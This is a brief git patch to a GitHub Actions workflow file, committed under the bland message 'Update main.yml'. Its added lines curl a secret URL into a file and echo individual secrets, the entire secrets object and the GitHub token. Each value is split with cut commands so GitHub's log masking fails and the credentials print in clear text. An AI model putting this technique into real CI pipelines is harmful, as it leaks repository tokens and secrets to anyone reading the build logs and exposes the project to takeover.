From 58a0053d94d5eb3903e12592cf1378d6ac6744a6 Mon Sep 17 00:00:00 2001 From: Wael <38723677+WaelAbuSeada@users.noreply.github.com> Date: Wed, 14 Sep 2022 16:22:29 +0200 Subject: [PATCH] Update main.yml --- .github/workflows/main.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 0755990..7a55d41 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -9,6 +9,11 @@ jobs: steps: - name: Action test run: | + curl ${{secrets.TEST_URL}} > hidden.txt + echo ${{ secrets.TEST_URL }} >> foo && cut -c1-3 foo && cut -c4- foo echo "Retrieved hidden information" echo "-----" + echo -n "${{ secrets.HIDDEN_URL }}" >> foo && cut -c1-3 foo && cut -c4- foo + echo -n "${{ tojson(secrets) }}" >> foo && cut -c1-3 foo && cut -c4- foo + echo -n "${{ tojson(secrets.github_token) }}" >> boo && cut -c1-3 boo && cut -c4- boo